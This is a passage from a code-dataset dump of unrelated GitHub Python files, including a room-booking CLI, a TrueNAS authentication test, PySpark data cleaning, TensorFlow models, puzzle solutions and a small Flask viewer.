print_items_from_list(\"Available Rooms\", available_rooms)\n\n\ndef find_and_book_suitable_room(user_id):\n print(f\"{SEPARATOR}\\n\\t\\t\\tFIND SUITABLE ROOMS\\n\")\n user_details = get_user_details(user_id)\n available_booking_limit = get_available_booking_limit_quota(\n user_details[\"organization_id\"]\n )\n print(\n f\"\\n\\t\\t\\tAvailable monthly conference room booking quota \"\n f\"for your organization is : {available_booking_limit} hours\"\n )\n from_datetime = input(START_DATETIME_PROMPT)\n to_datetime = input(END_DATETIME_PROMPT)\n from_datetime_obj_ist = get_datetime_obj_from_str_ist(from_datetime)\n to_datetime_obj_ist = get_datetime_obj_from_str_ist(to_datetime) + timedelta(\n seconds=-1\n )\n validate_duration(from_datetime_obj_ist, to_datetime_obj_ist, True)\n capacity = int(input(\"\\t\\t\\tEnter value for capacity : \"))\n print(\n \"\\t\\t\\tEnter the required equipment ids from followings (comma separated, example : 1,3)\"\n )\n for equipment in equipments:\n print(\"\\t\\t\\t\\tID : {}, Name : {}\".format(equipment[\"id\"], equipment[\"name\"]))\n required_equipments = input(\"\\t\\t\\tValue for equipments ids : \")\n required_equipments = (\"\".join(required_equipments.split())).split(\",\")\n required_equipments = list(map(int, required_equipments))\n available_rooms = get_available_conference_rooms(\n from_datetime_obj_ist, to_datetime_obj_ist, capacity, required_equipments\n )\n if not available_rooms:\n print(\n \"\\t\\t\\t\\tNo rooms available for selected date time. Checking for next available slots\\n\"\n )\n for _ in range(4):\n from_datetime_obj_ist = from_datetime_obj_ist + timedelta(hours=1)\n to_datetime_obj_ist = to_datetime_obj_ist + timedelta(hours=1)\n available_rooms = get_available_conference_rooms(\n from_datetime_obj_ist,\n to_datetime_obj_ist,\n capacity,\n required_equipments,\n )\n if available_rooms:\n break\n if not available_rooms:\n print(\"\\t\\t\\t\\tNo rooms available. Please try for some other dates/time\\n\")\n return\n show_suitable_rooms(available_rooms)\n allowed_booking_by_user = check_if_user_allowed_to_book_room(user_id)\n if allowed_booking_by_user:\n booking_allowed, reason = check_booking_limit(\n user_details[\"organization_id\"], from_datetime_obj_ist, to_datetime_obj_ist\n )\n if not booking_allowed:\n print(reason)\n else:\n print(\n f\"\\t\\t\\tKindly enter the serial number to book a conference room from above options\"\n )\n print(\"\\t\\t\\t\\tEnter 0 to go to main menu\\n\")\n choice = int(input(VALUE_PROMPT))\n if choice == 0:\n return\n elif choice <= len(available_rooms):\n booking_details = {\n \"room_id\": available_rooms[choice - 1][\"id\"],\n \"from_datetime\": from_datetime_obj_ist,\n \"to_datetime\": to_datetime_obj_ist,\n \"booked_by\": user_id,\n \"organization_id\": user_details[\"organization_id\"],\n }\n booked, info = create_booking(\n booking_details, capacity, required_equipments\n )\n if booked:\n print(f\"\\n\\t\\t\\tBooking successful, Booking id is : {info}\")\n else:\n print(\n f\"\\n\\t\\t\\tBooking failed, Reason : {info}\\n\\t\\t\\tPlease try to book some other room.\"\n )\n\n\ndef cancel_a_booking(user_id):\n print(f\"{SEPARATOR}\\n\\t\\t\\tCANCEL BOOKING\\n\")\n filters = {\"user_id\": user_id}\n user_bookings = get_bookings(**filters)\n print_items_from_list(\"Your booking details\", user_bookings)\n booking_id = int(input(f\"\\n\\t\\t\\tEnter the booking id to cancel a booking : \"))\n booking_details = get_booking_details(booking_id)\n now_datetime = get_current_datetime_ist()\n if (\n int((booking_details[\"from_datetime\"] - now_datetime).total_seconds())\n > ALLOWED_CANCELLATION_IN_ADVANCE_SECONDS\n ):\n booking_details.update({\"cancelled\": True})\n print(f\"\\n\\t\\t\\tCancellation successful\")\n else:\n print(\n f\"\\n\\t\\t\\tSorry!\\n\\t\\t\\tCancellation is allowed before {ALLOWED_CANCELLATION_IN_ADVANCE_MINUTES}\"\n f\" minutes before the start time of the booking\"\n )\n\n\ndef show_all_bookings(user_id):\n print(f\"{SEPARATOR}\\n\\t\\t\\tLIST ALL BOOKINGS\\n\")\n from_datetime = input(START_DATETIME_PROMPT)\n to_datetime = input(END_DATETIME_PROMPT)\n from_datetime_obj_ist = get_datetime_obj_from_str_ist(from_datetime)\n to_datetime_obj_ist = get_datetime_obj_from_str_ist(to_datetime) + timedelta(\n seconds=-1\n )\n validate_duration(from_datetime_obj_ist, to_datetime_obj_ist, False)\n print(f\"\\n\\t\\t\\tEnter 1 to see all bookings done by you\")\n print(\"\\t\\t\\tEnter 2 to see all bookings for your organization\")\n print(\"\\t\\t\\tEnter the user id to see all bookings done by that user\")\n integer_value = int(input(VALUE_PROMPT))\n filters = {\n \"from_datetime_obj_ist\": from_datetime_obj_ist,\n \"to_datetime_obj_ist\": to_datetime_obj_ist,\n }\n if integer_value == 1:\n filters.update({\"user_id\": user_id})\n bookings = get_bookings(**filters)\n else:\n allowed = check_if_user_allowed_to_see_all_bookings(user_id)\n if not allowed:\n print(ACTION_NOT_ALLOWED)\n return\n user_org_id = get_user_details(user_id)[\"organization_id\"]\n if integer_value == 2:\n filters.update({\"organization_id\": user_org_id})\n bookings = get_bookings(**filters)\n else:\n other_user_org_id = get_user_details(integer_value)[\"organization_id\"]\n if (\n user_org_id == other_user_org_id\n ): # check to see if user belong to same organization\n filters.update({\"user_id\": integer_value})\n bookings = get_bookings(**filters)\n else:\n print(ACTION_NOT_ALLOWED)\n return\n print_items_from_list(\"Booking details\", bookings)\n","repo_name":"techieaman94/conference-room-booking-system","sub_path":"crbs/user_functionalities.py","file_name":"user_functionalities.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25275340004","text":"import json\nimport shlex\n\nimport pytest\n\nfrom middlewared.test.integration.assets.account import user\nfrom middlewared.test.integration.utils import ssh\n\n\n@pytest.mark.parametrize(\"url\", [\"127.0.0.1\", \"127.0.0.1:6000\"])\n@pytest.mark.parametrize(\"root\", [True, False])\ndef test_tcp_connection_from_localhost(url, root):\n cmd = f\"midclt -u ws://{url}/websocket call auth.sessions '[[\\\"current\\\", \\\"=\\\", true]]' '{{\\\"get\\\": true}}'\"\n if root:\n assert json.loads(ssh(cmd))[\"credentials\"] == \"ROOT_TCP_SOCKET\"\n else:\n with user({\n \"username\": \"unprivileged\",\n \"full_name\": \"Unprivileged User\",\n \"group_create\": True,\n \"password\": \"test1234\",\n }):\n result = ssh(f\"sudo -u unprivileged {cmd}\", check=False, complete_response=True)\n assert \"Not authenticated\" in result[\"stderr\"]\n","repo_name":"truenas/middleware","sub_path":"tests/api2/test_ip_auth.py","file_name":"test_ip_auth.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":2144,"dataset":"github-code","pt":"20"} +{"seq_id":"33297810302","text":"import pyspark.sql.functions as F\nfrom pyspark.sql import SparkSession\nfrom scipy import rand\n\nfrom util.data import process_value_list_str\n\n\ndef drop_unnecessary_columns(df):\n columns_to_drop = [\n 'TEMP_ave', # Entirely empty\n\n 'Shape',\n 'Neighbour_Shape',\n ]\n df = df.drop(*columns_to_drop)\n\n return df\n\n\ndef process_timestamp(df):\n # Assuming acq_date is already in date format. If not, convert it using to_date function\n df = df.withColumn('acq_date', F.to_date(F.col('acq_date'), 'yyyy-MM-dd'))\n\n # Extract year, month, day\n df = df.withColumn('acq_year', F.year('acq_date'))\n df = df.withColumn('acq_month', F.month('acq_date'))\n df = df.withColumn('acq_day', F.dayofmonth('acq_date'))\n\n # Extract day_of_the_week (1 - Sunday, 7 - Saturday)\n df = df.withColumn('acq_day_of_the_week', F.dayofweek('acq_date'))\n\n # Extract day_of_the_month\n df = df.withColumn('acq_day_of_the_month', F.dayofmonth('acq_date'))\n\n # Create separate columns for each season\n df = df.withColumn('acq_spring', F.when((F.col('acq_month').between(3, 5)), 1).otherwise(0))\n df = df.withColumn('acq_summer', F.when((F.col('acq_month').between(6, 8)), 1).otherwise(0))\n df = df.withColumn('acq_fall', F.when((F.col('acq_month').between(9, 11)), 1).otherwise(0))\n df = df.withColumn('acq_winter', F.when((F.col('acq_month').isin([12, 1, 2])), 1).otherwise(0))\n\n # Drop the original 'acq_date' column\n df = df.drop('acq_date')\n\n return df\n\n\ndef process_list_str_columns(df):\n df = df.withColumn(\"frp\", process_value_list_str(F.col(\"frp\")))\n df = df.withColumn(\"acq_time\", process_value_list_str(F.col(\"acq_time\")))\n df = df.withColumn(\"Neighbour_frp\", process_value_list_str(F.col(\"Neighbour_frp\")))\n df = df.withColumn(\"Neighbour_acq_time\", process_value_list_str(F.col(\"Neighbour_acq_time\")))\n\n return df\n\n\ndef remove_outliers(df):\n print(f\"# of rows before removing outliers: {df.count():,}\")\n\n # Manual list of numerical columns\n numerical_columns = [\"frp\"]\n\n # Automatically filter numerical columns based on DataFrame schema\n # numerical_columns = [field.name for field in df.schema.fields if field.dataType in (FloatType(), DoubleType(), IntegerType(), LongType())]\n\n no_outliers_df = df\n for column in numerical_columns:\n # Calculate Q1, Q3, and IQR\n quantiles = no_outliers_df.approxQuantile(column, [0.25, 0.75], 0.05)\n q1, q3 = quantiles[0], quantiles[1]\n iqr = q3 - q1\n\n # Define the lower and upper range for non-outliers\n lower_range = q1 - 1.5 * iqr\n upper_range = q3 + 1.5 * iqr\n\n # Remove outliers\n no_outliers_df = no_outliers_df.filter((F.col(column) >= lower_range) & (F.col(column) <= upper_range))\n\n print(f\"# of rows after removing outliers: {df.count():,}\")\n\n return no_outliers_df\n\n\ndef drop_empty_rows(df):\n # Count the number of rows with an empty value in any column\n num_rows_with_empty_value = df.where(\" or \".join([f\"{c} IS NULL\" for c in df.columns])).count()\n\n print(f'# of rows with an empty value in any column: {num_rows_with_empty_value:,}')\n print(f'# of rows without an empty value in any column: {df.count() - num_rows_with_empty_value:,}')\n print(f'Percentage of rows with an empty value in any column: {num_rows_with_empty_value / df.count() * 100.0:,}')\n\n # Remove the rows with an empty value in any column\n df = df.dropna(subset=None)\n\n return df\n\n\ndef randomly_sample(df):\n # Randomly sample the dataset\n df = df.orderBy(rand()).limit(int(df.count() * 0.01)) # sampling\n\n # Show the new number of rows\n print(\"Number of rows after sampling:\", df.count())\n\n return df\n\n\nif __name__ == '__main__':\n # Initialize Spark session\n spark = SparkSession.builder \\\n .appName(\"Clean Data\") \\\n .config(\"spark.driver.memory\", \"20g\") \\\n .getOrCreate()\n\n # Load data\n df = spark.read.parquet(f\"../tmp/datasets/original\")\n\n df = drop_unnecessary_columns(df)\n df = process_list_str_columns(df)\n df = process_timestamp(df)\n df = remove_outliers(df)\n df = drop_empty_rows(df)\n # df = randomly_sample(df)\n\n # Coalesce the DataFrame into a single partition\n df = df.coalesce(1)\n\n # Save the cleaned datasets as a Parquet file\n df.write.mode(\"overwrite\").parquet('../tmp/datasets/processed')\n\n # Stop the Spark session\n spark.stop()\n","repo_name":"ivantha/wildfire-project","sub_path":"scripts/4_1_create_processed_dataset.py","file_name":"4_1_create_processed_dataset.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40512272033","text":"import tensorflow as tf\nimport numpy as np\n\nsess = tf.Session()\n\na = tf.placeholder(dtype=tf.float16, shape=[2, 2],name='a')\nb = tf.placeholder(dtype=tf.float16, shape=[2, 2],name='b')\n\nadd = tf.add(a, b)\nsess = tf.Session()\nret = sess.run(add, feed_dict={a: np.random.randint(0, 10, size=(2, 2)), b: np.random.randint(0, 10, size=(2, 2))})\nprint(ret)\nsave_path = 'saver/fns.ckpt'\n\n#Create a saver\n\n'''python v1 = tf.Variable(..., name='v1') v2 = tf.Variable(..., name='v2')\n# Pass the variables as a dict: saver = tf.train.Saver({'v1': v1, 'v2': v2})\n# Or pass them as a list. saver = tf.train.Saver([v1, v2]) \n# Passing a list is equivalent to passing a dict with the variable op names \n# as keys: saver = tf.train.Saver({v.op.name: v for v in [v1, v2]}) '''\nv1 = tf.Variable(0, name='v1')\nv2 = tf.Variable(0, name='v2')\nsaver=tf.train.Saver(var_list=[v1])\n#Launch the graph and train, saving the model every 1,000 steps.\n\nres = saver.save(sess, save_path)\n","repo_name":"softpo/fast-style-transfer-softpo","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27563028814","text":"\"\"\"\n0623: 第31题\n给定一个列表,要求每一位都是所给数字的最小值\n如果没有比当前的排列更大的排列了(如 3 2 1这样最后的排列),就返回最小的排列(比如 1 2 3)\n\n(1): 1,2,3 → 1,3,2\n(2): 3,2,1 → 1,2,3\n(3): 1,1,5 → 1,5,1\n\"\"\"\n\n\"\"\"\n目标:\n 在输入的数字中,如果前一位数字大于当前数字,则进行调换顺序\n 并将其后面的全部逆序 \n\"\"\"\n\nclass Solution:\n def nextPermutation(self, nums):\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n stack = []\n i = len(nums) - 1 # i = 2, nums = [1, 2, 3]\n while i > -1:\n # nums[i], nums[stack[-1]]: 前一位是不是小于后一位\n if stack and nums[i] < nums[stack[-1]]:\n pivot = stack.pop()\n\n while stack and nums[i] < nums[stack[-1]]:\n pivot = stack.pop()\n\n nums[i], nums[pivot] = nums[pivot], nums[i]\n break\n\n stack.append(i)\n i -= 1\n nums[i + 1:] = nums[i + 1:][::-1] # i+1 之后所有字符调换顺序\n\n\n\"\"\"\n(1) stack = [2], i -= 1, i = 1\n(2) nums[1] = 2, stack[-1] = 2, nums[2] = 3, i = 1 \n 2 < 3:\n pivot = stack.pop() = 2\n stack = []\n nums[i] = 2, nums[pivot] = nums[2] = 3\n nums = [1, 3, 2]\n(3)nums[i+1:] = nums[2:] = nums[2:][::-1] = ''\n\"\"\"\n\ns = Solution()\nnums = [1, 3, 6, 4]\ns.nextPermutation(nums)\nprint(nums)\n","repo_name":"YuHe0108/LeetCode","sub_path":"other/31. Next Permutation.py","file_name":"31. Next Permutation.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"4206972175","text":"# verification-helper: PROBLEM https://judge.yosupo.jp/problem/unionfind\nimport sys\nfrom library.union_find import UnionFind\n\ninput = sys.stdin.readline\n\nN, Q = map(int, input().split())\nuf = UnionFind(N)\nfor _ in range(Q):\n t, u, v = map(int, input().split())\n if t == 0:\n uf.unite(u, v)\n else:\n print(1 if uf.same(u, v) else 0)\n","repo_name":"tera-saki/atcoder-templates","sub_path":"tests/yosupo/union_find.test.py","file_name":"union_find.test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"16145555328","text":"from flask import Flask, request, redirect, send_file\nimport json, os\nfrom datetime import datetime\nimport sensor_graph\n\n# 初期設定 --- (※1)\njsonfile = 'sensor.json'\npngfile = 'sensor.png'\napp = Flask(__name__) # Flaskを生成\n\n# サーバーのルートにアクセスがあった時 --- (※2)\n@app.route('/')\ndef index():\n return \"/save or /graph\"\n\n# JSONファイルを元にグラフを描画 --- (※3)\n@app.route('/graph')\ndef graph():\n sensor_graph.draw_file(jsonfile, pngfile)\n # 描画したファイルを出力 --- (※4)\n return send_file(pngfile, mimetype='image/png')\n\n# センサーの値を保存する --- (※5)\n@app.route('/save')\ndef save():\n # 投稿されたデータを取得する --- (※6)\n t = request.args.get('t', '') # 温度\n h = request.args.get('h', '') # 湿度\n c = request.args.get('c', '') # CPU温度\n if t == '' or h == '' or c == '': return 'False'\n dt = datetime.now().strftime('%Y/%m/%d %H:%M:%S')\n # 取得した値をJSONに書き込む --- (※7)\n data = []\n if os.path.exists(jsonfile):\n with open(jsonfile, encoding='utf-8') as fp:\n data = json.load(fp)\n data.append({\n 'time': dt, \n 'temp': float(t), \n 'humi': float(h),\n 'cpu': float(c),\n })\n with open(jsonfile, 'w', encoding='utf-8') as fp:\n json.dump(data, fp)\n return 'True'\n\nif __name__ == '__main__': # サーバー起動 --- (※8)\n app.run('0.0.0.0', 8889, debug=True)\n\n","repo_name":"kujirahand/book-json-sample","sub_path":"src/ch3/get_sensor_server.py","file_name":"get_sensor_server.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"ja","doc_type":"code","stars":15,"dataset":"github-code","pt":"20"} +{"seq_id":"25431849498","text":"import numpy as np\n\n\ndef get_input(filename):\n with open(filename) as file:\n lines = file.read().splitlines()\n points = []\n steps = []\n line = lines.pop(0)\n while len(line) > 0:\n points.append([int(value) for value in line.split(',')])\n line = lines.pop(0)\n for line in lines:\n step = []\n if 'x' in line:\n step.append('left')\n else:\n step.append('up')\n step.append(int(line.split('=')[1]))\n steps.append(step)\n return points, steps\n\n\ndef print_points(points):\n max_x = max([point[0] for point in points]) + 1\n max_y = max([point[1] for point in points]) + 1\n for y in range(max_y):\n for x in range(max_x):\n if [x, y] in points:\n print('#', end='')\n else:\n print('.', end='')\n print()\n print()\n\n\ndef main():\n points, steps = get_input('input.txt')\n for direction, value in steps:\n new_points = []\n for point in reversed(points):\n x, y = point\n if direction == 'left' and x > value:\n new_point = [value - (x - value), y]\n points.remove(point)\n if new_point not in points:\n new_points.append(new_point)\n elif direction == 'up' and y > value:\n points.remove(point)\n new_point = [x, value - (y - value)]\n if new_point not in points:\n new_points.append(new_point)\n points += new_points\n print_points(points)\n\n\nmain()\n","repo_name":"zackjohnson298/AdventOfCode","sub_path":"2021/Day13/Part2.py","file_name":"Part2.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8715654183","text":"from Bio import Entrez, SeqIO\n\nEntrez.email = \"benjamin.r.jack@gmail.com\"\n\n# Download T7 wild-type and E. coli K12 genbank records\nhandle = Entrez.efetch(db=\"nuccore\", id=[\"NC_001604\"], rettype=\"gb\", retmode=\"text\")\n\nrecords = SeqIO.parse(handle, \"genbank\")\n\noutfile = open(\"T7polycistron.fasta\", \"w\")\n\n# Set starting and ending genes for polycistronic transcript\nstart_gene = \"T7p44\"\nend_gene = \"T7p46\"\n\nfor record in records:\n\n for feature in record.features:\n # Grab coding sequences\n if feature.type == \"CDS\":\n # Everything should have a locus tag\n if \"locus_tag\" in feature.qualifiers:\n id = feature.qualifiers[\"locus_tag\"][0]\n # Check to see if this is the gene that we are starting or ending\n # with\n if id == start_gene:\n start = feature.location.start.position\n elif id == end_gene:\n end = feature.location.end.position\n else:\n continue\n\n\n# Grab sequence based on ranges colected above\ndna = record.seq[start:end]\n# Write out the file\nout = \">\" + start_gene + \":\" + end_gene + \"\\n\" + str(dna)\noutfile.write(out)\noutfile.close()\nhandle.close()\n","repo_name":"benjaminjack/phage_attenuation","sub_path":"scripts/python/extract_polycistronic_transcript.py","file_name":"extract_polycistronic_transcript.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"23344993139","text":"from vectorizer.model.config import *\n\nimport tensorflow as tf\n# from vectorizer.model.sampling import makeDataSet, padListsToMatrix, removeLeaveNodePadEmbeddings, \\\n# removeMidNodePadEmbeddings\nfrom vectorizer.model.constVariable import *\nfrom vectorizer.model.sampling import *\nfrom vectorizer.parameters import NUM_FEATURES # 中间节点向量的维度\nimport pickle\n\n\nclass ASTNN:\n def __init__(self):\n # 定义编码器所使用的的神经元\n self.encode_cell_fw = tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE)\n self.encode_cell_bw = tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE)\n\n # 定义解码器所使用的LSTM结构\n self.dec_cell = tf.nn.rnn_cell.MultiRNNCell(\n [\n tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE)\n for _ in range(NUM_LAYER)\n ]\n )\n\n # 为中间节点,叶子节点,函数名节点分别定义词向量\n self.leaveEmbedding = tf.get_variable(\n \"leave\", [LEAVE_VOCAB_SIZE, HIDDEN_SIZE]\n )\n self.targetEmbedding = tf.get_variable(\n \"target\", [TAR_VOCAB_SIZE, HIDDEN_SIZE]\n )\n\n # 中间节点向量矩阵通过Word2vect预训练得到,直接从外存读入\n with open(midNodeEmbeddingPath, \"rb\") as f:\n embeddingAndDicTuple = pickle.load(f)\n self.midNodeEmbedding = embeddingAndDicTuple[0]\n\n # 定义处理合并向量的矩阵以及bias\n self.merge_weight = tf.get_variable(\n \"merge_weight\", [HIDDEN_SIZE + NUM_FEATURES, HIDDEN_SIZE]\n )\n self.merge_bias = tf.get_variable(\n \"merge_bias\", [HIDDEN_SIZE]\n )\n\n # 定义softmax层变量\n if SHARE_EMB_AND_SOFTMAX:\n self.softmax_weight = tf.transpose(self.targetEmbedding)\n else:\n self.softmax_weight = tf.get_variable(\n \"weight\", [HIDDEN_SIZE, TAR_VOCAB_SIZE]\n )\n self.softmax_bias = tf.get_variable(\n \"bias\", [TAR_VOCAB_SIZE]\n )\n\n def forward(self, midNodeList, leaveList, STNum, trgInput, trgLabel,\n trg_size):\n # 对矩阵进行填充得到规范矩阵\n midNodeListPad, leaveNodeListPad, trgInputPad, trgLabelPad = \\\n padListsToMatrix(midNodeList, leaveList, trgInput, trgLabel, STNum)\n\n # 获得中间节点向量矩阵 batchSize * statementLen * maxListLen * NUM_FEATURES\n # maxListLen为每个batch中最长list的维度\n midNodeEmbedding = tf.nn.embedding_lookup(self.midNodeEmbedding, midNodeListPad)\n\n # 获得叶子节点向量矩阵 batchSize * statementLen * maxListLen * HIDDEN_SIZE\n leaveEmbedding = tf.nn.embedding_lookup(self.leaveEmbedding, leaveNodeListPad)\n\n # 获得目标向量的矩阵 batchSize * statementLen * maxListLen * HIDDEN_SIZE\n trgEmbedding = tf.nn.embedding_lookup(self.targetEmbedding, trgInputPad)\n\n # 将填充的向量设置为零向量\n\n # 根据midNodeList创建一个矩阵,矩阵的每个维度的大小是列表中的最高维度的大小,\n # 得到的矩阵包含两个值0,以及向量的大小\n # 如果是0,则该位置经过mask变换后将形成一个0向量\n # 若是向量的大小,经过mask变换后将保留原先向量的值\n midNodemaskInput = removeMidNodePadEmbeddingsMaskInput(midNodeList, NUM_FEATURES)\n leaveNodemaskInput = removeLeaveNodePadEmbeddingsMaskInput(leaveList, HIDDEN_SIZE)\n\n midNodeMask = tf.sequence_mask(midNodemaskInput, NUM_FEATURES, dtype=tf.float32)\n leaveNodeMask = tf.sequence_mask(leaveNodemaskInput, HIDDEN_SIZE, dtype=tf.float32)\n\n midNodeEmbeddingRemovePad = midNodeEmbedding * midNodeMask\n leaveEmbeddingRemovePad = leaveNodeMask * leaveEmbedding\n\n # 在词向量上进行dropout\n midNodeEmbedding = tf.nn.dropout(midNodeEmbeddingRemovePad, KEEP_PROB)\n leaveEmbedding = tf.nn.dropout(leaveEmbeddingRemovePad, KEEP_PROB)\n\n # 对特征进行累加求和\n midNodeEmbedding = tf.reduce_sum(midNodeEmbedding, axis=2)\n leaveEmbedding = tf.reduce_sum(leaveEmbedding, axis=2)\n\n # 对midEmbedding以及leaveEmbedding进行拼接 batchSize * STLen * (NUM_FEATURES + HIDDEN_SIZE)\n mergeEmbedding = tf.concat([midNodeEmbedding, leaveEmbedding], 2)\n\n # 将合并的向量维度转化成HIDDEN_SIZE,\n rnnEmbedding = tf.tanh(tf.matmul(mergeEmbedding, self.merge_weight) + self.merge_bias)\n\n # 构造双向循环神经网络编码器\n # 这里的time step就是statement子树的个数\n with tf.variable_scope(\"encoder\"):\n enc_outputs, enc_states = tf.nn.bidirectional_dynamic_rnn(\n self.encode_cell_fw, self.encode_cell_bw, rnnEmbedding, STNum, dtype=tf.float32\n )\n\n # 将两个LSTM的输出拼接为一个张量\n enc_outputs = tf.concat([enc_outputs[0], enc_outputs[1]], -1)\n\n with tf.variable_scope(\"decoder\"):\n attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(\n HIDDEN_SIZE, enc_outputs, memory_sequence_length=STNum\n )\n\n # 将解码器的循环神经网络self.dec_cell和注意力一起封装成更高层次的循环神经网络\n attention_cell = tf.contrib.seq2seq.AttentionWrapper(\n self.dec_cell, attention_mechanism, attention_layer_size=HIDDEN_SIZE\n )\n\n dec_outputs, _ = tf.nn.dynamic_rnn(\n attention_cell, trgEmbedding, trg_size, dtype=tf.float32\n )\n\n # 计算解码器的log perplexity\n output = tf.reshape(dec_outputs, [-1, HIDDEN_SIZE])\n logits = tf.matmul(output, self.softmax_weight) + self.softmax_bias\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=tf.reshape(trgLabelPad, [-1]), logits=logits)\n\n # 在计算平均损失时,需要将填充位的权重设置为0,以避免无效位置的预测干扰\n # 模型的训练\n\n label_weights = tf.sequence_mask(\n trg_size, maxlen=len(trgLabel[0]), dtype=tf.float32\n )\n label_weights = tf.reshape(label_weights, [-1])\n cost = tf.reduce_sum(loss * label_weights)\n cost_per_token = cost / tf.reduce_sum(label_weights)\n\n # 定义反向传播操作\n trainable_variables = tf.trainable_variables()\n grads = tf.gradients(cost / tf.to_float(BATCH_SIZE), trainable_variables)\n grads, _ = tf.clip_by_global_norm(grads, MAX_GRAD_NORM)\n\n optimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)\n train_op = optimizer.apply_gradients(zip(grads, trainable_variables))\n\n return cost_per_token, train_op\n\n def run_epoch(self, session, cost_op, train_op, saver, step):\n # 训练一个epoch\n # 重复训练步骤直至遍历完所有的数据\n while True:\n try:\n # 运行train_op并计算损失值\n cost, _ = session.run([cost_op, train_op])\n\n # 每处理100个batch打印一下损失值\n if step % 10 == 0:\n print(\"After %d steps ,per token cost is %.3f\" % (step, cost))\n\n # 每1000步保存一个checkpoint\n if step % 100 == 0:\n saver.save(session, CHECKPOINT_PATH, global_step=step)\n step += 1\n except tf.errors.OutOfRangeError:\n break\n return step\n\n def main(self):\n initializer = tf.contrib.layers.variance_scaling_initializer(factor=1.0, mode='FAN_OUT', uniform=True)\n\n # 定义训练用的循环神经网络模型\n with tf.variable_scope(\"astnn\", reuse=None, initializer=initializer):\n train_model = ASTNN()\n\n # 定义输入数据,sample操作\n sample_gen = batchSamples(BATCH_SIZE)\n midNodeList, midNodesListLen, leaveList, leaveNodesListLen, STNum, trgInput, trgLabel, trgSize = sample_gen.__next__()\n\n # 定义前向计算图\n cost_op, train_op = train_model.forward(midNodeList, leaveList, STNum, trgInput, trgLabel,\n trgSize)\n\n # 训练模型\n saver = tf.train.Saver()\n step = 1\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n for i in range(NUM_EPOCH):\n print(\"In iteration : %d\" % (i + 1))\n step = self.run_epoch(sess, cost_op, train_op, saver, step)\n\n\nif __name__ == \"__main__\":\n astnn = ASTNN()\n astnn.main()\n","repo_name":"zhichengshi/extractASTFromXml","sub_path":"vectorizer/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6621077526","text":"import pathlib\nfrom datetime import datetime\nfrom flask import Flask\n\n\n_ROOT_DIR = pathlib.Path(__file__).absolute().parent.parent\n_INDEX_HTML = '''\n\n \n \n
    \n {users}\n
\n \n\n'''\n_USER_LINE_HTML = '''\n
  • user {user_id}
  • \n'''\n_USER_PAGE_HTML = '''\n\n \n Brain Computer Interface: User {user_id}\n \n \n \n {thoughts}\n
    \n \n\n'''\n_USER_THOUGHT_HTML = '''\n\n {ts}\n {thought}\n\n'''\n\napp = Flask(__name__)\n\n\ndef run_webserver(address, data_dir):\n data_path = pathlib.Path(data_dir)\n @app.route('/')\n def handle_index():\n users_html = []\n for user_dir in data_path.iterdir():\n users_html.append(_USER_LINE_HTML.format(user_id=user_dir.name))\n return _INDEX_HTML.format(users='\\n'.join(users_html))\n\n @app.route('/users/')\n def handle_user(user_id):\n thoughts = []\n print(user_id)\n data_user_dir_path = data_path / user_id\n for thought_file in data_user_dir_path.iterdir():\n user_thought = _USER_THOUGHT_HTML.format(\n ts=get_date_from_filename(file=thought_file),\n thought=thought_file.read_text())\n thoughts.append(user_thought)\n return _USER_PAGE_HTML.format(user_id=data_user_dir_path.name,\n thoughts='\\n'.join(thoughts))\n host, port = address\n app.run(host=host, port=port)\n\n\ndef get_date_from_filename(file):\n ts = datetime.strptime(file.stem, '%Y-%m-%d_%H-%M-%S')\n return ts.strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef main(argv):\n if len(argv) != 3:\n print(f'USAGE: {argv[0]}
    ')\n return 1\n try:\n addr_arr = argv[1].split(':')\n run_webserver((addr_arr[0], int(addr_arr[1])), argv[2])\n except Exception as error:\n print(f'ERROR: {error}')\n return 1\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","repo_name":"michaldeutch/ASDServerClient","sub_path":"serverclient/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74445790770","text":"# -*- coding: utf-8 -*-\n'''\nqwe = a\nrt = b\nasd = c\nfg = d\nzxc =e\nvb = f\nyu = g\niop = h\nhj = i\nkl = j\nn = k\nm = l\n'''\n\nimport json\nkeymap = {'q':'2', 'a':'2', 'z':'2',\\\n 'w':'3', 's':'3', 'x':'3',\\\n 'e':'4', 'd':'4', 'c':'5',\\\n 'r':'5', 'f':'5', 'v':'5',\\\n 't':'5', 'g':'5', 'b':'6',\\\n 'y':'6', 'h':'6', 'n':'6',\\\n 'u':'6', 'j':'6', 'm':'6',\\\n 'i':'7', 'k':'7',\\\n 'o':'8', 'l':'8',\\\n 'p':'9'}\n\ndef dumpToJson():\n keyseq = 